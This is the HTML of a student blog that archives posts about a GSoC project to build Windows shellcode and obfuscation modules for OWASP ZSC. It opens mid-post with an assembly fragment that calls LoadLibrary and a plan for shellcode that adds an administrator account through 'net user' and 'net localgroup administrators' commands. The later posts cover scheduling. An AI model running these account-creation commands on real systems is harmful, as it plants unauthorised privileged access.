    mov [ecx + 10], dl ; insert NULL for string termination<br />
    mov ebx, 0x7639a820 ; address of LoadLibrary as we got it from ctypes (use the LoadLibraryA address: the string above is narrow, not wide)<br />
    push ecx<br />
    call ebx</blockquote>
Add shellcode for creating a user and adding the user to the admin group - we can use WinExec to run cmd.exe and directly use the commands "net user USERNAME PASSWORD /ADD" and "net localgroup administrators USERNAME /ADD", or the other way is to use NetUserAdd and NetLocalGroupAddMembers, which are in Netapi32.dll<br />
<br />
<br />
This schedule is till the mid-term, and after that I will spend one more week adding one or two of the shellcodes that are in the proposal. I will post the timeline for the code obfuscation modules part while doing the project, when I have time in between.<br />
<br />
<br />
Thanks for reading this long post. Have a good day :)</div>
<b>Timeline for GSoC project</b> (2016-05-01)<div dir="ltr" style="text-align: left;" trbidi="on">
<div class="tr_bq">
<span style="font-family: "courier new" , "courier" , monospace;">Hello,</span></div>
<div class="tr_bq">
<span style="font-family: "courier new" , "courier" , monospace;"><br /></span></div>
<span style="font-family: "courier new" , "courier" , monospace;">I got accepted into GSoC this year and I am so excited to work with an open source organization :). This summer I will be working on my project with OWASP ZSC, and <a href="https://summerofcode.withgoogle.com/projects/#5901330824560640">here</a> is the link to my project on the GSoC site. The project is <b>Windows Shellcode and Code Obfuscation modules</b>. So over the summer I will be creating Windows shellcode and code obfuscation modules for the ZSC tool. The coding period officially starts on 23rd May and we are currently in the community bonding period. In this period I have to familiarize myself with the organization and the code base, interact with mentors and make a plan for the project before full-time coding begins. </span><br />
<span style="font-family: "courier new" , "courier" , monospace;"><br /></span>
<span style="font-family: "courier new" , "courier" , monospace;"><a href="https://docs.google.com/document/d/1_ekisZ0WebQIn69iRI1GnlNKrwoSJxGhtfRHskIgEpM/">Here</a> is my proposed timeline that I will be working on during the coding period. Basically this project has two parts: one is developing shellcodes for Windows and the second is adding code obfuscation modules for different languages. I will most likely work on the shellcode part first, as I mentioned in my proposal. I didn't write the technical details about the shellcodes and modules from my proposal in this post, but I will write them in the next post after discussing with my mentors, along with a more detailed timeline if possible. I will discuss with Brian which way I should go to develop the shellcodes, as in my proposal I mentioned two ways. I will try to have that discussion on the mailing list mostly, and if I have a discussion on Skype/Telegram then I will post the details on the mailing list so that it can be helpful for others too.</span><br />
<span style="font-family: "courier new" , "courier" , monospace;"><br /></span>
<span style="font-family: "courier new" , "courier" , monospace;">My exams start on 3rd May. So I will be less active from May 2 - 10, but I will check the mailing list regularly. I have one more exam on 16th May<span style="font-size: x-small;">(it was on 7th but was postponed)</span>, but I will be available from May 11 - May 15th. After my exams I will be able to work full time, and I hope to complete the project successfully and learn many things :)</span><br />
<span style="font-family: "courier new" , "courier" , monospace;"><br /></span><span style="font-family: "courier new" , "courier" , monospace;">In next blog I will add technical details for shellcode part and also add more details to timeline.</span></div>
<b>Hello World</b> (2016-04-26)<div dir="ltr" style="text-align: left;" trbidi="on">
Hi,<br />
<br />
I will use this blog to post about my GSoC project. It will be used to keep track of the project and get feedback from mentors. I will post soon about the community bonding period.<br />
<br /></div>